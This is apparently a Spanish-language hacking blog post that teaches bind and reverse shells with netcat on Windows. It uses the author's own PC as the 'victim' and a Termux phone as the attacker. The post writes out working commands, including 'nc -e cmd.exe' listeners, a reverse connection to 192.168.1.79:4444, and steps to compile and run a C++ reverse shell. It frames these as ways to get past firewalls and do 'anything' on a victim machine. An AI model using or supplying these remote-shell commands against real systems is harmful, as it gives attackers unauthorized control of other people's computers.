Home ¿Me invitas aun café? (NetCat y C++)
Post
Cancel

¿Me invitas aun café? (NetCat y C++)

Estaba aburrido como siempre así que pensé no hay ningún blog (Aparte de este) donde usen esta bonita herramienta llamada Netcat y este otro lenguaje llamado C o C++ para ataques, entonces me dije traigamos algo sencillo para empezar a ver si otros se motivan atraer cosas mas interesantes.

Primero debemos saber que es una shell, según Wikipedia una Shell es «En informática, el shell o intérprete de órdenes o intérprete de comandos es el programa informático que provee una interfaz de usuario para acceder a los servicios del sistema operativo», entonces, ¿Qué es una Shell Directa?

Shell Directa


Una Shell directa es un ataque dónde (nosotros) se conectara a la maquina Victima y tendremos, en este caso sera windows (Mi PC) y la maquina atacante mi celular (Usando Termux), la desventaja de hacerlo de forma directa es que cualquier firewall nos puede impedir esto así que en el proceso probablemente vean algo como esto

shell1

Windows 10


shell2

1
nc -l -n -p 4444 -e cmd.exe

Comandos:

  • -i: Pone a netcat en modo escucha. (Listen mode)

  • -n: Omite las búsquedas de DNS de la maquina

  • -p; Puerto

  • -e: Aquí pondremos la shell en nuestro caso CMD, para linux; /bin/bash, bash puede cambiar, por ejemplo, zsh, ya depende de lo que use la victima.

Mi celular (Desde Termux)

1
nc -vv IP 4444

Comandos

  • -vv Para tener toda la información detallada

shell3

Pondré el comando dir para ver los archivos dentro de la carpeta Netcat desde mi celular atacante :T

shell4
shell5

cd \..\.. para retroceder, como ven puedo hacer cualquier cosa hasta con mas imaginación puedo subir algún archivo divertido. :]

Shell inverso.


Bueno en el otro método como os dije su desventaja es que al tratar de conectarnos la maquina nos bloquea de inmediato y no podemos hacer la conexión remota a la maquina, es por eso que haremos lo contrario, es decir, la maquina victima se conectara a nosotros los atacantes y nosotros solo haremos escucha de nuestra victima, y como no, le damos un café por tal generosidad:

Mi celular (Desde Termux)

1
nc -n -vv -l -p 4444

shell6

comandos

  • -n Le decimos que no lea los DNS de nombre sobre la maquina
  • -vv información detallada.
  • -l Listen mode
  • -p Puerto

Windows


1
nc -e cmd.exe -n -v 192.168.1.79 4444

shell7

Nos conectamos a nosotros… Y.. :]

shell8

Puse un Hola mundo en C++ de ejemplo de que podemos ejecutar cualquier cosa.

Ahora bien, como vemos ni bloqueando todos los puertos o confiarse de firewalls mal configurados no impide deque podamos hacer muchas cosas, esto es un ejemplo practico porque podemos hacer cosas mejores un ejemplo de ello: hacking con html. También podemos hacer uso de lenguajes como C++, Perl, Python, etc. Para crear nuestras shells inversas, pondré un código sencillo en C++ (Hay muchas así hasta mejores, pero aun así aplica para lo que están aprendiendo de manera sencilla y eficaz)

shell9

Y lo mismo que en la shell reverse, compilamos g++ shell.cpp -o shell y luego hacemos escucha desde nuestra pc atacante nc -n -vv -l -p 4444, ponemos ./shell en la pc victima y wala.

Espero que les guste este blog como a mi me gusto escribirlo; No existe un lugar para esconderse. A donde vayas todos están conectados

This post is licensed under CC BY 4.0 by the author.

Introduccion a winAPI C/C++

Pilas y Colas en C++